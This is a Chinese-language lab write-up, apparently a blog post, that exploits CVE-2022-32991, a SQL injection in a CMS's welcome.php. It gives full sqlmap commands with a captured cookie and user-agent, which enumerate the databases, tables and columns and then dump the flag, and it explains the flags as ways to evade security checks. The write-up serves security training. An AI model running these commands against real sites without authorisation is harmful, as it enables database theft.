[春秋云镜] CVE-2022-32991 靶场详解

目录

前期准备

工具

渗透测试

靶场提示

靶场实战

0x01 访问路径

0x02 注册用户并登入

0x03 url存在注入点

0x04 获取cookie和user-agent

0x05 sqlmap爆破

前期准备

工具

1.Burpsuite(对应java环境)

2.Sqlmap(对应python环境)

渗透测试

靶场提示

该CMS的welcome.php中存在SQL注入攻击

靶场实战

0x01 访问路径

0x02 注册用户并登入

0x03 url存在注入点

官方有提示:该CMS的welcome.php中存在SQL注入攻击。发现注入点。

0x04 获取cookie和user-agent

这存在两种方法,获取cookie是为了绕过身份验证,user-agent和random-agent主要是为了绕过客户端认证,否则容易被安全机制拦截。

方法一:抓包

点击第一个进去之后抓包

网页设置好代理->burpsuite设置代理->刷新页面

方法二:鼠标右键->检查->网络-> 刷新->找到第一个包,查看cookie和user-agent。

获取信息

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.56
​
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669168062; PHPSESSID=ivsudpm85lhn6l3p28huleb65s; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1669169499

0x05 sqlmap爆破

验证是否存在注入

sqlmap -u 'http://eci-2zecq1f7rd92k35i8jqc.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34' -p 'eid' --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.56" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669168062; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1669168062; PHPSESSID=ivsudpm85lhn6l3p28huleb65s" -batch

爆破数据库

sqlmap -u 'http://eci-2zecq1f7rd92k35i8jqc.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34' -p 'eid' --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.56" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669168062; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1669168062; PHPSESSID=ivsudpm85lhn6l3p28huleb65s" -batch --dbs

爆破表

sqlmap -u 'http://eci-2zecq1f7rd92k35i8jqc.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34' -p 'eid' --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.56" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669168062; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1669168062; PHPSESSID=ivsudpm85lhn6l3p28huleb65s" -batch -D ctf --tables

爆破列

sqlmap -u 'http://eci-2zecq1f7rd92k35i8jqc.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34' -p 'eid' --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.56" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669168062; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1669168062; PHPSESSID=ivsudpm85lhn6l3p28huleb65s" -batch -D ctf -T flag --columns

 

爆破字段

sqlmap -u 'http://eci-2zecq1f7rd92k35i8jqc.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34' -p 'eid' --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.56" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669168062; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1669168062; PHPSESSID=ivsudpm85lhn6l3p28huleb65s" -batch -D ctf -T flag -C flag --dump

0x06 获得flag

 flag{e9dd7838-f6fe-4adf-a2a3-e7a49ed92a91}

总结

本次靶场主要考察的是对sql注入的用法,运用了一些sqlmap的参数对安全机制的绕过。

-p                       指定注入的参数
--batch                  使用默认方法去执行sql注入
--random-agent           随机更换请求头
--user-agent             使用指定的请求头
--cookie                 使用指定cookie

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

心"元"意“码”

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值